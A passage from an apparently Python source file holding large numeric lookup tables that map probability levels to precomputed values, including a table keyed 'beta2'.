0.267: 0.16590398574870388, 0.268: 0.16707394307554502, 0.269: 0.168247184315915, 0.27: 0.16942369789720155, 0.271: 0.17060347221452565, 0.272: 0.17178649563082535, 0.273: 0.1729727564770086, 0.274: 0.17416224305204242, 0.275: 0.17535494362307535, 0.276: 0.1765508464255532, 0.277: 0.1777499396633379, 0.278: 0.17895221150881968, 0.279: 0.18015765010303586, 0.28: 0.1813662435557958, 0.281: 0.18257797994577735, 0.282: 0.18379284732066176, 0.283: 0.1850108336972498, 0.284: 0.18623192706156758, 0.285: 0.18745611536901166, 0.286: 0.18868338654443928, 0.287: 0.18991372848229773, 0.288: 0.19114712904674702, 0.289: 0.19238357607177733, 0.29: 0.1936230573613347, 0.291: 0.1948655606894299, 0.292: 0.19611107380026316, 0.293: 0.19735958440834733, 0.294: 0.198611080198637, 0.295: 0.19986554882663596, 0.296: 0.20112297791851938, 0.297: 0.20238335507126698, 0.298: 0.2036466678527809, 0.299: 0.2049129038020017, 0.3: 0.20618205042904286, 0.301: 0.20745409521529598, 0.302: 0.2087290256135832, 0.303: 0.2100068290482507, 0.304: 0.21128749291530408, 0.305: 0.21257100458254238, 0.306: 0.2138573513896706, 0.307: 0.21514652064842565, 0.308: 0.21643849964271128, 0.309: 0.21773327562871456, 0.31: 0.21903083583502458, 0.311: 0.220331167462782, 0.312: 0.22163425768578188, 0.313: 0.22294009365060716, 0.314: 0.22424866247676634, 0.315: 0.22555995125679856, 0.316: 0.22687394705642888, 0.317: 0.22819063691467345, 0.318: 0.22951000784397224, 0.319: 0.2308320468303265, 0.32: 0.2321567408334091, 0.321: 0.23348407678671212, 0.322: 0.23481404159767033, 0.323: 0.23614662214778254, 0.324: 0.237481805292754, 0.325: 0.23881957786260755, 0.326: 0.24015992666183777, 0.327: 0.24150283846951434, 0.328: 0.24284830003942898, 0.329: 0.24419629810023297, 0.33: 0.245546819355548, 0.331: 0.2468998504841105, 0.332: 0.24825537813989712, 0.333: 0.24961338895226673, 0.334: 0.2509738695260785, 0.335: 0.25233680644183276, 0.336: 0.25370218625580476, 0.337: 0.25506999550016285, 0.338: 0.256440220683123, 0.339: 0.2578128482890625, 0.34: 0.2591878647786696, 0.341: 0.2605652565890646, 0.342: 0.26194501013393234, 0.343: 0.263327111803676, 0.344: 0.2647115479655286, 0.345: 0.26609830496368747, 0.346: 0.2674873691194764, 0.347: 0.2688787267314526, 0.348: 0.27027236407555005, 0.349: 0.27166826740522, 0.35: 0.27306642295155764, 0.351: 0.27446681692344055, 0.352: 0.27586943550767346, 0.353: 0.27727426486911566, 0.354: 0.2786812911508169, 0.355: 0.2800905004741664, 0.356: 0.28150187893901313, 0.357: 0.28291541262381076, 0.358: 0.2843310875857532, 0.359: 0.2857488898609069, 0.36: 0.2871688054643741, 0.361: 0.2885908203903904, 0.362: 0.2900149206125028, 0.363: 0.2914410920836759, 0.364: 0.2928693207364452, 0.365: 0.29429959248306115, 0.366: 0.29573189321561644, 0.367: 0.29716620880619204, 0.368: 0.2986025251069932, 0.369: 0.3000408279504931, 0.37: 0.301481103149569, 0.371: 0.3029233364976476, 0.372: 0.30436751376882576, 0.373: 0.3058136207180387, 0.374: 0.30726164308119197, 0.375: 0.30871156657528576, 0.376: 0.31016337689857654, 0.377: 0.31161705973070963, 0.378: 0.31307260073285487, 0.379: 0.3145299855478523, 0.38: 0.3159891998003598, 0.381: 0.3174502290969953, 0.382: 0.3189130590264567, 0.383: 0.3203776751596956, 0.384: 0.321844063050042, 0.385: 0.32331220823334217, 0.386: 0.3247820962281231, 0.387: 0.32625371253570534, 0.388: 0.3277270426403723, 0.389: 0.32920207200950036, 0.39: 0.3306787860936957, 0.391: 0.33215717032696657, 0.392: 0.333637210126832, 0.393: 0.3351188908944808, 0.394: 0.3366021980149178, 0.395: 0.3380871168571106, 0.396: 0.3395736327741287, 0.397: 0.34106173110327953, 0.398: 0.3425513971662752, 0.399: 0.3440426162693472, 0.4: 0.3455353737034259, 0.401: 0.3470296547442512, 0.402: 0.3485254446525525, 0.403: 0.3500227286741624, 0.404: 0.35152149204017535, 0.405: 0.35302171996710374, 0.406: 0.354523397657002, 0.407: 0.3560265102976395, 0.408: 0.35753104306261807, 0.409: 0.3590369811115355, 0.41: 0.3605443095901345, 0.411: 0.36205301363042935, 0.412: 0.363563078350876, 0.413: 0.3650744888565142, 0.414: 0.36658723023910045, 0.415: 0.36810128757726324, 0.416: 0.3696166459366538, 0.417: 0.37113329037008264, 0.418: 0.3726512059176903, 0.419: 0.37417037760706584, 0.42: 0.3756907904534177, 0.421: 0.3772124294597049, 0.422: 0.3787352796167929, 0.423: 0.38025932590360995, 0.424: 0.38178455328725935, 0.425: 0.38331094672322763, 0.426: 0.38483849115546587, 0.427: 0.3863671715166128, 0.428: 0.3878969727280741, 0.429: 0.38942787970020715, 0.43: 0.3909598773324491, 0.431: 0.39249295051349326, 0.432: 0.3940270841214294, 0.433: 0.3955622630238702, 0.434: 0.3970984720781446, 0.435: 0.39863569613138533, 0.436: 0.4001739200207477, 0.437: 0.4017131285734936, 0.438: 0.4032533066071969, 0.439: 0.40479443892984845, 0.44: 0.4063365103400534, 0.441: 0.40787950562712527, 0.442: 0.40942340957127205, 0.443: 0.4109682069437599, 0.444: 0.4125138825070144, 0.445: 0.4140604210148085, 0.446: 0.41560780721240526, 0.447: 0.4171560258367122, 0.448: 0.41870506161641524, 0.449: 0.42025489927213305, 0.45: 0.4218055235166062, 0.451: 0.4233569190547962, 0.452: 0.4249090705840457, 0.453: 0.42646196279425613, 0.454: 0.42801558036802023, 0.455: 0.4295699079807639, 0.456: 0.43112493030093746, 0.457: 0.43268063199011475, 0.458: 0.4342369977031689, 0.459: 0.4357940120884325, 0.46: 0.43735165978783974, 0.461: 0.43890992543707424, 0.462: 0.44046879366572034, 0.463: 0.4420282490974222, 0.464: 0.4435882763500427, 0.465: 0.4451488600357907, 0.466: 0.4467099847613878, 0.467: 0.44827163512821255, 0.468: 0.4498337957324814, 0.469: 0.4513964511653555, 0.47: 0.4529595860131227, 0.471: 0.45452318485734966, 0.472: 0.4560872322750172, 0.473: 0.45765171283868333, 0.474: 0.45921661111663087, 0.475: 0.4607819116730264, 0.476: 0.4623475990680795, 0.477: 0.4639136578581664, 0.478: 0.46548007259599816, 0.479: 0.4670468278307892, 0.48: 0.4686139081083855, 0.481: 0.47018129797143204, 0.482: 0.4717489819595075, 0.483: 0.47331694460931284, 0.484: 0.4748851704547982, 0.485: 0.47645364402728674, 0.486: 0.47802234985568237, 0.487: 0.4795912724665903, 0.488: 0.4811603963844984, 0.489: 0.48272970613188726, 0.49: 0.48429918622939716, 0.491: 0.48586882119599994, 0.492: 0.4874385955491512, 0.493: 0.4890084938049162, 0.494: 0.4905785004781269, 0.495: 0.49214860008258726, 0.496: 0.4937187771311442, 0.497: 0.4952890161358954, 0.498: 0.4968593016083247, 0.499: 0.4984296180594595, 0.5: 0.49999995000002634, 0.501: 0.501570281940593, 0.502: 0.503140598391728, 0.503: 0.5047108838641572, 0.504: 0.5062811228689086, 0.505: 0.5078512999174655, 0.506: 0.5094213995219258, 0.507: 0.5109914061951365, 0.508: 0.5125613044509014, 0.509: 0.5141310788040525, 0.51: 0.5157007137706554, 0.511: 0.5172701938681654, 0.512: 0.5188395036155542, 0.513: 0.5204086275334624, 0.514: 0.5219775501443703, 0.515: 0.5235462559727657, 0.516: 0.5251147295452544, 0.517: 0.5266829553907397, 0.518: 0.528250918040545, 0.519: 0.5298186020286205, 0.52: 0.5313859918916671, 0.521: 0.5329530721692634, 0.522: 0.5345198274040545, 0.523: 0.5360862421418862, 0.524: 0.537652300931973, 0.525: 0.539217988327026, 0.526: 0.5407832888834216, 0.527: 0.5423481871613691, 0.528: 0.5439126677250353, 0.529: 0.5454767151427029, 0.53: 0.5470403139869298, 0.531: 0.5486034488346969, 0.532: 0.5501661042675711, 0.533: 0.55172826487184, 0.534: 0.5532899152386647, 0.535: 0.5548510399642619, 0.536: 0.5564116236500098, 0.537: 0.5579716509026302, 0.538: 0.559531106334332, 0.539: 0.561089974562978, 0.54: 0.5626482402122126, 0.541: 0.5642058879116199, 0.542: 0.5657629022968834, 0.543: 0.5673192680099375, 0.544: 0.5688749696991147, 0.545: 0.5704299920192883, 0.546: 0.5719843196320321, 0.547: 0.5735379372057962, 0.548: 0.5750908294160064, 0.549: 0.5766429809452559, 0.55: 0.5781943764834458, 0.551: 0.5797450007279189, 0.552: 0.5812948383836369, 0.553: 0.5828438741633399, 0.554: 0.5843920927876468, 0.555: 0.5859394789852435, 0.556: 0.5874860174930375, 0.557: 0.5890316930562921, 0.558: 0.5905764904287797, 0.559: 0.5921203943729266, 0.56: 0.5936633896599984, 0.561: 0.5952054610702033, 0.562: 0.5967465933928549, 0.563: 0.598286771426558, 0.564: 0.5998259799793038, 0.565: 0.6013642038686663, 0.566: 0.6029014279219069, 0.567: 0.6044376369761812, 0.568: 0.605972815878622, 0.569: 0.6075069494865581, 0.57: 0.6090400226676023, 0.571: 0.6105720202998441, 0.572: 0.6121029272719771, 0.573: 0.6136327284834384, 0.574: 0.6151614088445854, 0.575: 0.6166889532768235, 0.576: 0.6182153467127918, 0.577: 0.6197405740964411, 0.578: 0.621264620383258, 0.579: 0.6227874705403462, 0.58: 0.6243091095466332, 0.581: 0.6258295223929876, 0.582: 0.6273486940823675, 0.583: 0.6288666096299769, 0.584: 0.6303832540634109, 0.585: 0.6318986124227917, 0.586: 0.633412669760958, 0.587: 0.6349254111435296, 0.588: 0.6364368216491676, 0.589: 0.6379468863696165, 0.59: 0.6394555904099148, 0.591: 0.6409629188885073, 0.592: 0.6424688569374215, 0.593: 0.6439733897023986, 0.594: 0.6454765023430352, 0.595: 0.6469781800329419, 0.596: 0.6484784079598654, 0.597: 0.6499771713258791, 0.598: 0.6514744553474836, 0.599: 0.6529702452557735, 0.6: 0.6544645262966026, 0.601: 0.6559572837306726, 0.602: 0.657448502833754, 0.603: 0.6589381688967442, 0.604: 0.6604262672259017, 0.605: 0.6619127831429096, 0.606: 0.663397701985108, 0.607: 0.6648810091055518, 0.608: 0.6663626898731922, 0.609: 0.6678427296730491, 0.61: 0.6693211139063204, 0.611: 0.6707978279905191, 0.612: 0.6722728573596439, 0.613: 0.6737461874643103, 0.614: 0.6752178037718943, 0.615: 0.6766876917666598, 0.616: 0.6781558369499654, 0.617: 0.6796222248403179, 0.618: 0.6810868409735612, 0.619: 0.6825496709030271, 0.62: 0.6840107001996586, 0.621: 0.6854699144521739, 0.622: 0.6869272992671747, 0.623: 0.6883828402693223, 0.624: 0.6898365231014565, 0.625: 0.6912883334247485, 0.626: 0.6927382569188532, 0.627: 0.6941862792820104, 0.628: 0.6956323862312337, 0.629: 0.6970765635024082, 0.63: 0.6985187968504759, 0.631: 0.6999590720495417, 0.632: 0.7013973748930374, 0.633: 0.7028336911938431, 0.634: 0.7042680067844215, 0.635: 0.7057003075169808, 0.636: 0.7071305792635945, 0.637: 0.7085588079163645, 0.638: 0.7099849793875307, 0.639: 0.7114090796096405, 0.64: 0.7128310945356621, 0.641: 0.7142510101391204, 0.642: 0.7156688124142838, 0.643: 0.717084487376214, 0.644: 0.7184980210610075, 0.645: 0.7199093995258576, 0.646: 0.7213186088492126, 0.647: 0.7227256351309164, 0.648: 0.7241304644923598, 0.649: 0.7255330830765977, 0.65: 0.7269334770484782, 0.651: 0.7283316325948096, 0.652: 0.7297275359244724, 0.653: 0.7311211732685733, 0.654: 0.7325125308805537, 0.655: 0.733901595036347, 0.656: 0.7352883520345028, 0.657: 0.7366727881963586, 0.658: 0.7380548898661029, 0.659: 0.739434643410972, 0.66: 0.7408120352213614, 0.661: 0.7421870517109705, 0.662: 0.743559679316915, 0.663: 0.7449299044998705, 0.664: 0.7462977137442283, 0.665: 0.7476630935582027, 0.666: 0.7490260304739599, 0.667: 0.7503865110477751, 0.668: 0.7517445218601482, 0.669: 0.7531000495159391, 0.67: 0.7544530806445042, 0.671: 0.7558036018998235, 0.672: 0.7571515999606306, 0.673: 0.7584970615305413, 0.674: 0.7598399733382102, 0.675: 0.761180322137431, 0.676: 0.7625180947072826, 0.677: 0.7638532778522458, 0.678: 0.7651858584023625, 0.679: 0.7665158232133165, 0.68: 0.7678431591666188, 0.681: 0.769167853169701, 0.682: 0.7704898921560582, 0.683: 0.7718092630853548, 0.684: 0.7731259529436056, 0.685: 0.7744399487432396, 0.686: 0.7757512375232757, 0.687: 0.77705980634943, 0.688: 0.7783656423142555, 0.689: 0.7796687325372516, 0.69: 0.7809690641650093, 0.691: 0.7822666243713208, 0.692: 0.7835614003573212, 0.693: 0.7848533793516024, 0.694: 0.7861425486103601, 0.695: 0.7874288954174895, 0.696: 0.7887124070847301, 0.697: 0.7899930709517766, 0.698: 0.7912708743864384, 0.699: 0.7925458047847241, 0.7: 0.7938178495709807, 0.701: 0.7950869961980253, 0.702: 0.7963532321472501, 0.703: 0.7976165449287628, 0.704: 0.7988769220815145, 0.705: 0.8001343511734024, 0.706: 0.8013888198013999, 0.707: 0.8026403155916954, 0.708: 0.8038888261997863, 0.709: 0.8051343393106174, 0.71: 0.8063768426387102, 0.711: 0.8076163239282677, 0.712: 0.8088527709533002, 0.713: 0.8100861715177531, 0.714: 0.8113165134556105, 0.715: 0.8125437846310448, 0.716: 0.8137679729384877, 0.717: 0.8149890663028079, 0.718: 0.8162070526793901, 0.719: 0.817421920054271, 0.72: 0.8186336564442488, 0.721: 0.8198422498970002, 0.722: 0.8210476884912175, 0.723: 0.8222499603366951, 0.724: 0.8234490535744822, 0.725: 0.82464495637696, 0.726: 0.8258376569479937, 0.727: 0.8270271435230239, 0.728: 0.8282134043692099, 0.729: 0.8293964277855104, 0.73: 0.8305762021028226, 0.731: 0.8317527156841129, 0.732: 0.8329259569244847, 0.733: 0.8340959142513266, 0.734: 0.8352625761244205, 0.735: 0.8364259310360529, 0.736: 0.8375859675111375, 0.737: 0.8387426741073075, 0.738: 0.8398960394150405, 0.739: 0.8410460520577919, 0.74: 0.8421927006920776, 0.741: 0.8433359740075778, 0.742: 0.8444758607272893, 0.743: 0.8456123496075938, 0.744: 0.8467454294384124, 0.745: 0.8478750890432711, 0.746: 0.8490013172794411, 0.747: 0.8501241030380398, 0.748: 0.8512434352441408, 0.749: 0.8523593028568818, 0.75: 0.8534716948695734, 0.751: 0.8545806003098092, 0.752: 0.8556860082395743, 0.753: 0.8567879077553627, 0.754: 0.8578862879882565, 0.755: 0.8589811381040585, 0.756: 0.8600724473033952, 0.757: 0.8611602048218131, 0.758: 0.8622443999298985, 0.759: 0.8633250219333687, 0.76: 0.8644020601732016, 0.761: 0.8654755040257103, 0.762: 0.8665453429026564, 0.763: 0.8676115662513868, 0.764: 0.8686741635548794, 0.765: 0.8697331243319023, 0.766: 0.8707884381370734, 0.767: 0.8718400945610152, 0.768: 0.8728880832303882, 0.769: 0.8739323938080559, 0.77: 0.8749730159931451, 0.771: 0.8760099395211802, 0.772: 0.8770431541641623, 0.773: 0.8780726497306806, 0.774: 0.8790984160659892, 0.775: 0.8801204430521462, 0.776: 0.8811387206080885, 0.777: 0.8821532386897348, 0.778: 0.8831639872900949, 0.779: 0.8841709564393376, 0.78: 0.8851741362049375, 0.781: 0.8861735166917408, 0.782: 0.8871690880420503, 0.783: 0.8881608404357615, 0.784: 0.8891487640904325, 0.785: 0.8901328492613948, 0.786: 0.8911130862418335, 0.787: 0.8920894653628848, 0.788: 0.8930619769937581, 0.789: 0.8940306115417905, 0.79: 0.8949953594525705, 0.791: 0.8959562112100302, 0.792: 0.8969131573365103, 0.793: 0.8978661883929069, 0.794: 0.8988152949787099, 0.795: 0.8997604677321327, 0.796: 0.9007016973301941, 0.797: 0.9016389744887798, 0.798: 0.902572289962797, 0.799: 0.9035016345462047, 0.8: 0.904426999072146, 0.801: 0.9053483744130083, 0.802: 0.9062657514805408, 0.803: 0.9071791212259233, 0.804: 0.9080884746398658, 0.805: 0.9089938027526939, 0.806: 0.9098950966344315, 0.807: 0.910792347394901, 0.808: 0.9116855461838177, 0.809: 0.9125746841908512, 0.81: 0.9134597526457117, 0.811: 0.9143407428182829, 0.812: 0.9152176460186581, 0.813: 0.9160904535972341, 0.814: 0.9169591569448252, 0.815: 0.9178237474927222, 0.816: 0.9186842167127738, 0.817: 0.9195405561174878, 0.818: 0.9203927572601225, 0.819: 0.9212408117347362, 0.82: 0.9220847111762885, 0.821: 0.9229244472607281, 0.822: 0.9237600117050847, 0.823: 0.9245913962675107, 0.824: 0.9254185927473991, 0.825: 0.9262415929854614, 0.826: 0.9270603888637834, 0.827: 0.9278749723059329, 0.828: 0.9286853352770361, 0.829: 0.9294914697838355, 0.83: 0.9302933678747891, 0.831: 0.9310910216401402, 0.832: 0.9318844232119854, 0.833: 0.9326735647643802, 0.834: 0.9334584385133998, 0.835: 0.9342390367172065, 0.836: 0.9350153516761455, 0.837: 0.9357873757328031, 0.838: 0.9365551012720951, 0.839: 0.9373185207213172, 0.84: 0.9380776265502867, 0.841: 0.9388324112713275, 0.842: 0.9395828674393858, 0.843: 0.9403289876521342, 0.844: 0.9410707645499891, 0.845: 0.9418081908162181, 0.846: 0.9425412591769937, 0.847: 0.9432699624014971, 0.848: 0.9439942933019441, 0.849: 0.9447142447336556, 0.85: 0.9454298095952256, 0.851: 0.9461409808284335, 0.852: 0.9468477514184452, 0.853: 0.9475501143938321, 0.854: 0.9482480628266101, 0.855: 0.9489415898323792, 0.856: 0.9496306885703165, 0.857: 0.9503153522432926, 0.858: 0.9509955740979518, 0.859: 0.9516713474246952, 0.86: 0.9523426655578546, 0.861: 0.9530095218756819, 0.862: 0.9536719098004376, 0.863: 0.9543298227984653, 0.864: 0.9549832543802415, 0.865: 0.9556321981004747, 0.866: 0.9562766475580771, 0.867: 0.9569165963963785, 0.868: 0.957552038303007, 0.869: 0.9581829670101363, 0.87: 0.9588093762944023, 0.871: 0.9594312599770245, 0.872: 0.9600486119238871, 0.873: 0.9606614260455268, 0.874: 0.9612696962973124, 0.875: 0.9618734166793589, 0.876: 0.9624725812367078, 0.877: 0.9630671840593212, 0.878: 0.963657219282159, 0.879: 0.9642426810852343, 0.88: 0.9648235636936664, 0.881: 0.9653998613777618, 0.882: 0.9659715684530346, 0.883: 0.9665386792802856, 0.884: 0.9671011882656463, 0.885: 0.9676590898606391, 0.886: 0.9682123785622323, 0.887: 0.9687610489129148, 0.888: 0.9693050955007348, 0.889: 0.9698445129592854, 0.89: 0.9703792959678934, 0.891: 0.9709094392515344, 0.892: 0.9714349375810314, 0.893: 0.9719557857729668, 0.894: 0.9724719786897739, 0.895: 0.9729835112398603, 0.896: 0.9734903783775493, 0.897: 0.9739925751032259, 0.898: 0.9744900964633376, 0.899: 0.9749829375503833, 0.9: 0.9754710935031543, 0.901: 0.975954559506505, 0.902: 0.9764333307916824, 0.903: 0.9769074026361838, 0.904: 0.977376770363807, 0.905: 0.9778414293448636, 0.906: 0.9783013749960354, 0.907: 0.9787566027805276, 0.908: 0.9792071082080259, 0.909: 0.979652886834865, 0.91: 0.9800939342639616, 0.911: 0.9805302461449361, 0.912: 0.9809618181741064, 0.913: 0.9813886460944932, 0.914: 0.9818107256959976, 0.915: 0.9822280528152776, 0.916: 0.9826406233359377, 0.917: 0.9830484331884335, 0.918: 0.9834514783502447, 0.919: 0.983849754845784, 0.92: 0.9842432587465588, 0.921: 0.9846319861711421, 0.922: 0.9850159332851474, 0.923: 0.9853950963014838, 0.924: 0.9857694714800598, 0.925: 0.9861390551281946, 0.926: 0.9865038436003799, 0.927: 0.9868638332984115, 0.928: 0.9872190206714289, 0.929: 0.9875694022159492, 0.93: 0.9879149744757998, 0.931: 0.9882557340424174, 0.932: 0.9885916775546096, 0.933: 0.9889228016987052, 0.934: 0.9892491032085032, 0.935: 0.9895705788654393, 0.936: 0.9898872254986016, 0.937: 0.9901990399846192, 0.938: 0.9905060192478585, 0.939: 0.9908081602602608, 0.94: 0.9911054600416364, 0.941: 0.9913979156594912, 0.942: 0.9916855242290242, 0.943: 0.9919682829133988, 0.944: 0.9922461889235121, 0.945: 0.9925192395181012, 0.946: 0.9927874320039602, 0.947: 0.9930507637356284, 0.948: 0.9933092321156767, 0.949: 0.9935628345946121, 0.95: 0.9938115686709654, 0.951: 0.9940554318912629, 0.952: 0.9942944218501137, 0.953: 0.9945285361901042, 0.954: 0.9947577726020647, 0.955: 0.994982128824796, 0.956: 0.9952016026454088, 0.957: 0.9954161918988457, 0.958: 0.9956258944685976, 0.959: 0.9958307082861366, 0.96: 0.9960306313311733, 0.961: 0.9962256616318514, 0.962: 0.9964157972645225, 0.963: 0.9966010363532803, 0.964: 0.9967813770714362, 0.965: 0.9969568176399499, 0.966: 0.9971273563282133, 0.967: 0.9972929914544159, 0.968: 0.9974537213842967, 0.969: 0.997609544532683, 0.97: 0.99776045936265, 0.971: 0.9979064643855302, 0.972: 0.998047558161119, 0.973: 0.9981837392977511, 0.974: 0.9983150064523987, 0.975: 0.998441358329476, 0.976: 0.9985627936837991, 0.977: 0.9986793113165953, 0.978: 0.9987909100790213, 0.979: 0.9988975888701616, 0.98: 0.9989993466374386, 0.981: 0.9990961823781122, 0.982: 0.9991880951364369, 0.983: 0.9992750840051866, 0.984: 0.9993571481267158, 0.985: 0.9994342866927166, 0.986: 0.9995064989413405, 0.987: 0.9995737841591226, 0.988: 0.9996361416834054, 0.989: 0.999693570900148, 0.99: 0.9997460712416946, 0.991: 0.9997936421899241, 0.992: 0.9998362832780031, 0.993: 0.9998739940837995, 0.994: 0.9999067742301825, 0.995: 0.9999346234013291, 0.996: 0.9999575413149437, 0.997: 0.9999755277529793, 0.998: 0.9999885825363027, 0.999: 0.9999967055724355}, # skipcq: FLK-E231, FLK-E501 'beta2': {0.001: 0.18138618309331878, 0.002: 0.2095288006990791, 0.003: 0.22808938583740646, 0.004: 0.24231103099879125, 0.005: 0.25399266824367905, 0.006: 0.2639853316123639, 0.007: 0.27276438337239206, 0.008: 0.2806244307628958, 0.009: 0.2877616440177957, 0.01: 0.2943137216819569, 0.011: 0.3003813120390968, 0.012: 0.3060403810987299, 0.013: 0.3113497805549208, 0.014: 0.3163561002121821, 0.015: 0.3210969013101458, 0.016: 0.325602941614643, 0.017: 0.329899749275389, 0.018: 0.33400876269337276, 0.019: 0.33794817324913373, 0.02: 0.3417335597331963, 0.021: 0.3453783736859486, 0.022: 0.3488943160363729, 0.023: 0.3522916331669663, 0.024: 0.3555793523572848, 0.025: 0.3587654710031575, 0.026: 0.3618571101532857, 0.027: 0.36486064019226205, 0.028: 0.36778178455819777, 0.029: 0.37062570597348865, 0.03: 0.37339707863290983, 0.031: 0.37610014902380184, 0.032: 0.3787387874740419, 0.033: 0.3813165320847782, 0.034: 0.3838366263675599, 0.035: 0.38630205164508613, 0.036: 0.3887155550719671, 0.037: 0.3910796739716751, 0.038: 0.3933967570598198, 0.039: 0.39566898302294606, 0.04: 0.3978983768411247, 0.041: 0.400086824177587, 0.042: 0.40223608410583866, 0.043: 0.4043478004003044, 0.044: 0.4064235115828295, 0.045: 0.40846465988692804, 0.046: 0.41047259927722757, 0.047: 0.4124486026424321, 0.048: 0.41439386826257285, 0.049: 0.4163095256370182, 0.05: 0.41819664074840723, 0.051: 0.42005622082694316, 0.052: 0.4218892186715135, 0.053: 0.4236965365765072, 0.054: 0.4254790299068756, 0.055: 0.42723751035902224, 0.056: 0.42897274894021686, 0.057: 0.4306854786954264, 0.058: 0.4323763972069631, 0.059: 0.4340461688895506, 0.06: 0.43569542710067843, 0.061: 0.4373247760837633, 0.062: 0.43893479276010283, 0.063: 0.4405260283836726, 0.064: 0.44209901007086383, 0.065: 0.443654242216893, 0.066: 0.44671336964273567, 0.067: 0.44671336964273567, 0.068: 0.4497070389866893, 0.069: 0.4497070389866893, 0.07: 0.45263858990657657, 0.071: 0.45263858990657657, 0.072: 0.4540820432314365, 0.073: 0.45551110378697934, 0.074: 0.4569261207298041, 0.075: 0.4583274301949174, 0.076: 0.45971535594807744, 0.077: 0.46109020999750316, 0.078: 0.4624522931676177, 0.079: 0.4638018956379941, 0.08: 0.46513929744980287, 0.081: 0.4664647689820931, 0.082: 0.4677785714002497, 0.083: 0.46908095707825426, 0.084: 0.47037216999690146, 0.085: 0.4716524461194248, 0.086: 0.47292201374610887, 0.087: 0.4741810938492603, 0.088: 0.47542990038988897, 0.089: 0.4766686406172559, 0.09: 0.4778975153524657, 0.091: 0.47911671925695065, 0.092: 0.48032644108707956, 0.093: 0.4815268639354624, 0.094: 0.4827181654599544, 0.095: 0.4839005181010876, 0.096: 0.48507408928867246, 0.097: 0.4862390416379627, 0.098: 0.4873955331364289, 0.099: 0.48854371732133284, 0.1: 0.4896837434487873, 0.101: 0.49081575665475574, 0.102: 0.49193989810855143, 0.103: 0.4930563051590159, 0.104: 0.49416511147415587, 0.105: 0.495266447174198, 0.106: 0.49636043895869586, 0.107: 0.49744721022798233, 0.108: 0.49852688119905497, 0.109: 0.4995995690166022, 0.11: 0.5006653878589256, 0.111: 0.5017244490394137, 0.112: 0.5027768611037023, 0.113: 0.5038227299225796, 0.114: 0.5048621587811261, 0.115: 0.5058952484639588, 0.116: 0.5069220973371278, 0.117: 0.5079428014264691, 0.118: 0.5089574544929876, 0.119: 0.5099661481050076, 0.12: 0.5109689717074745, 0.121: 0.5119660126886201, 0.122: 0.5129573564438621, 0.123: 0.5139430864373226, 0.124: 0.5149232842608563, 0.125: 0.5158980296909226, 0.126: 0.5168674007432517, 0.127: 0.5178314737253517, 0.128: 0.5187903232872535, 0.129: 0.5197440224701283, 0.13: 0.520692642753303, 0.131: 0.5216362540994293, 0.132: 0.5225749249981224, 0.133: 0.5235087225078974, 0.134: 0.5244377122967149, 0.135: 0.52536195868101, 0.136: 0.5262815246634096, 0.137: 0.5271964719690554, 0.138: 0.5281068610807536, 0.139: 0.5290127512728111, 0.14: 0.5299142006438173, 0.141: 0.5308112661481983, 0.142: 0.5317040036268519, 0.143: 0.5325924678365663, 0.144: 0.5334767124786391, 0.145: 0.5343567902264184, 0.146: 0.5352327527520485, 0.147: 0.5361046507522651, 0.148: 0.5369725339733495, 0.149: 0.5378364512353526, 0.15: 0.5386964504554625, 0.151: 0.5395525786707096, 0.152: 0.540404882059873, 0.153: 0.5412534059647808, 0.154: 0.542098194910871, 0.155: 0.5429392926271754, 0.156: 0.5437767420656946, 0.157: 0.5446105854201171, 0.158: 0.5454408641439848, 0.159: 0.5462676189684185, 0.16: 0.5470908899191484, 0.161: 0.5479107163331672, 0.162: 0.5487271368748141, 0.163: 0.5495401895514537, 0.164: 0.5503499117285972, 0.165: 0.551156340144686, 0.166: 0.5519595109254223, 0.167: 0.5527594595976102, 0.168: 0.5535562211027355, 0.169: 0.5543498298100424, 0.17: 0.5551403195293081, 0.171: 0.5559277235232404, 0.172: 0.5567120745195285, 0.173: 0.5574934047225648, 0.174: 0.5582717458248277, 0.175: 0.559047129017996, 0.176: 0.5598195850037039, 0.177: 0.5605891440040408, 0.178: 0.5613558357717686, 0.179: 0.5621196896002469, 0.18: 0.5628807343331038, 0.181: 0.5636389983736705, 0.182: 0.5643945096941182, 0.183: 0.5651472958444157, 0.184: 0.565897383961005, 0.185: 0.5666448007752878, 0.186: 0.5673895726218545, 0.187: 0.5681317254465624, 0.188: 0.5688712848143356, 0.189: 0.5696082759168204, 0.19: 0.570342723579832, 0.191: 0.5718040861049116, 0.192: 0.5718040861049116, 0.193: 0.5732555639507467, 0.194: 0.5732555639507467, 0.195: 0.5746973432714193, 0.196: 0.5746973432714193, 0.197: 0.5761296050215254, 0.198: 0.5761296050215254, 0.199: 0.5775525251538719, 0.2: 0.5775525251538719, 0.201: 0.5789662748077831, 0.202: 0.5789662748077831, 0.203: 0.580371020488508, 0.204: 0.580371020488508, 0.205: 0.5810700676469496, 0.206: 0.5817669242382939, 0.207: 0.5824616098472468, 0.208: 0.5831541437995564, 0.209: 0.5838445451667302, 0.21: 0.5845328327706043, 0.211: 0.5852190251878382, 0.212: 0.585903140754301, 0.213: 0.5865851975693661, 0.214: 0.5872652135000757, 0.215: 0.5879432061852801, 0.216: 0.5886191930396023, 0.217: 0.5892931912573885, 0.218: 0.5899652178165296, 0.219: 0.5906352894822113, 0.22: 0.5913034228105724, 0.221: 0.5919696341523156, 0.222: 0.5926339396561907, 0.223: 0.5932963552724543, 0.224: 0.5939568967562234, 0.225: 0.5946155796707533, 0.226: 0.5952724193906889, 0.227: 0.5959274311051924, 0.228: 0.596580629821043, 0.229: 0.5972320303656522, 0.23: 0.5978816473900281, 0.231: 0.5985294953716854, 0.232: 0.5991755886174532, 0.233: 0.5998199412662939, 0.234: 0.6004625672920095, 0.235: 0.601103480505905, 0.236: 0.6017426945594111, 0.237: 0.6023802229466413, 0.238: 0.6030160790069156, 0.239: 0.6036502759272008, 0.24: 0.6042828267445396, 0.241: 0.6049137443484032, 0.242: 0.6055430414830111, 0.243: 0.6061707307496114, 0.244: 0.6067968246086884, 0.245: 0.6074213353821661, 0.246: 0.6080442752555413, 0.247: 0.6086656562799749, 0.248: 0.6092854903743761, 0.249: 0.609903789327387, 0.25: 0.6105205647993905, 0.251: 0.6111358283244531, 0.252: 0.6117495913122184, 0.253: 0.6123618650497772, 0.254: 0.6129726607035273, 0.255: 0.6135819893209489, 0.256: 0.6141898618323709, 0.257: 0.6147962890527381, 0.258: 0.6154012816832698, 0.259: 0.6160048503131699, 0.26: 0.6166070054212498, 0.261: 0.6172077573775245, 0.262: 0.6178071164448349, 0.263: 0.6184050927803595, 0.264: 0.6190016964371575, 0.265: 0.6195969373656643, 0.266: 0.6201908254151702, 0.267: 0.6207833703352457, 0.268: 0.6213745817771764, 0.269: 0.6219644692953454, 0.27: 